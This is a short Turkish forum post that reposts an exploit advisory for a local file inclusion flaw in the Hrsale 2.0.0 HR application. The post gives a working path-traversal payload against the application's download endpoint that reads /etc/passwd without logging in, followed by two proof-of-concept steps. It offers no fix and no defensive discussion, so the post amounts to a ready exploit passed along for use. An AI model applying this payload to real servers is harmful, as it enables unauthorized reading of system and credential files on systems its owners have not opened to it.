Hoşgeldin Misafir

Hrsale 2.0.0 - Local File Inclusion Vulnerability

Asım Gürsoy

mersin
27 Mar 2020
8,833 Mesaj

Aktiflik

Seviye

Deneyim

TIM / GÖREV:
Hrsale 2.0.0 - Local File Inclusion Vulnerability--


Kod:
# Exploit Title: Hrsale 2.0.0 - Local File Inclusion
# Exploit Author: Sosecure
# Vendor Homepage: https://hrsale.com/index.php
# Version: version 2.0.0
 
Description:
This exploit allow you to download any readable file from server with out permission and login session.
 
Payload :
           https://hrsale/download?type=files&filename=../../../../../../../../etc/passwd
POC:
 
  1.  Access to HRsale application and browse to download path with payload
  2.  Get /etc/passwd
 
#  0day.today [2020-10-24]  #